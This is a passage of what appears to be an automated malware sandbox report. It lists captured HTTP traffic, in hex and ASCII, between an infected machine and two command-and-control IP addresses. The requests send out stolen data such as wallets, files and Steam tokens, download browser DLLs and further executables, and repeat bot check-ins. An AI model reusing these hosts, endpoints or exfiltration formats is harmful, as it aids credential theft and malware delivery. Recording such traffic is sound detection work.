48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 2d 2d 0d 0a Data Ascii: ------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="file"------FCFHJKJJJECGDHJJDHDA--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file"------AFBKKFBAEGDHJJJJKFBK--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000129001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/runtime.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000150001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/XClient_protected.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000190001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/BitcoinCore.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.215.113.17Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.215.113.17Content-Length: 1067Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63 6d 56 6d 62 33 68 66 5a 6e 55 33 64 32 35 6c 63 6a 4d 75 5a 47 56 6d 59 58 56 73 64 43 31 79 5a 57 78 6c 59 58 4e 6c 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 76 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4c 33 42 79 62 32 52 31 59 33 52 7a 4c 32 5a 70 63 6d 56 6d 62 33 67 4b 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 76 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4c 32 74 69 4c 32 4e 31 63 33 52 76 62 57 6c 36 5a 53 31 6d 61 58 4a 6c 5a 6d 39 34 4c 57 4e 76 62 6e 52 79 62 32 78 7a 4c 57 4a 31 64 48 52 76 62 6e 4d 74 59 57 35 6b 4c 58 52 76 62 32 78 69 59 58 4a 7a 50 33 56 30 62 56 39 7a 62 33 56 79 59 32 55 39 5a 6d 6c 79 5a 57 5a 76 65 43 31 69 63 6d 39 33 63 32 56 79 4a 6e 56 30 62 56 39 74 5a 57 52 70 64 57 30 39 5a 47 56 6d 59 58 56 73 64 43 31 69 62 32 39 72 62 57 46 79 61 33 4d 6d 64 58 52 74 58 32 4e 68 62 58 42 68 61 57 64 75 50 57 4e 31 63 33 52 76 62 57 6c 36 5a 51 70 6f 64 48 52 77 63 7a 6f 76 4c 33 64 33 64 79 35 74 62 33 70 70 62 47 78 68 4c 6d 39 79 5a 79 39 6a 62 32 35 30 63 6d 6c 69 64 58 52 6c 4c 77 70 6f 64 48 52 77 63 7a 6f 76 4c 33 64 33 64 79 35 74 62 33 70 70 62 47 78 68 4c 6d 39 79 5a 79 39 68 59 6d 39 31 64 43 38 4b 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 76 5a 6d 6c 79 5a 57 5a 76 65 43 38 2f 64 58 52 74 58 32 31 6c 5a 47 6c 31 62 54 31 6d 61 58 4a 6c 5a 6d 39 34 4c 57 52 6c 63 32 74 30 62 33 41 6d 64 58 52 74 58 33 4e 76 64 58 4a 6a 5a 54 31 69 62 32 39 72 62 57 46 79 61 33 4d 74 64 47 39 76 62 47 4a 68 63 69 5a 31 64 47 31 66 59 32 46 74 63 47 46 70 5a 32 34 39 62 6d 56 33 4c 58 56 7a 5a 58 4a 7a 4a 6e 56 30 62 56 39 6a 62 32 35 30 5a 57 35 30 50 53 31 6e 62 47 39 69 59 57 77 4b 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="message"wallets------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 2d 2d 0d 0a Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="message"files------CAFBGDHCBAEHIDGCGIDA--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="file"------CBAEHCAEGDHJKFHJKFIJ--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 2d 2d 0d 0a Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="message"ybncbhylepme------BGDHDAFIDGDBGCAAFIDH--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKFHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 2d 2d 0d 0a Data Ascii: ------DBFIDGIIIJDBGDGDAKKFContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------DBFIDGIIIJDBGDGDAKKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DBFIDGIIIJDBGDGDAKKF--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/whiteheroin.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000192001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: 